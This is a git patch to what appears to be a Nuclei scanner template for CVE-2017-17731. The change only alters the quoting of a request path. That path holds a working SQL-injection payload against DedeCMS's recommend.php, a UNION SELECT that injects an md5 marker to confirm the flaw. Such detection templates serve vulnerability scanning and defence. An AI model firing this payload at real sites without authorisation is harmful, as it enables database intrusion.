From 5d204637bd948dd161269f3b3159659fe5fd0086 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 May 2023 16:39:12 +0530 Subject: [PATCH] Update CVE-2017-17731.yaml --- http/cves/CVE-2017-17731.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/CVE-2017-17731.yaml b/http/cves/CVE-2017-17731.yaml index d26440b50d..cfd0c34b5a 100644 --- a/http/cves/CVE-2017-17731.yaml +++ b/http/cves/CVE-2017-17731.yaml @@ -26,7 +26,7 @@ variables: http: - method: GET path: - - "{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294" + - '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294' matchers-condition: and matchers: @@ -37,4 +37,4 @@ http: - type: status status: - - 200 + - 200 \ No newline at end of file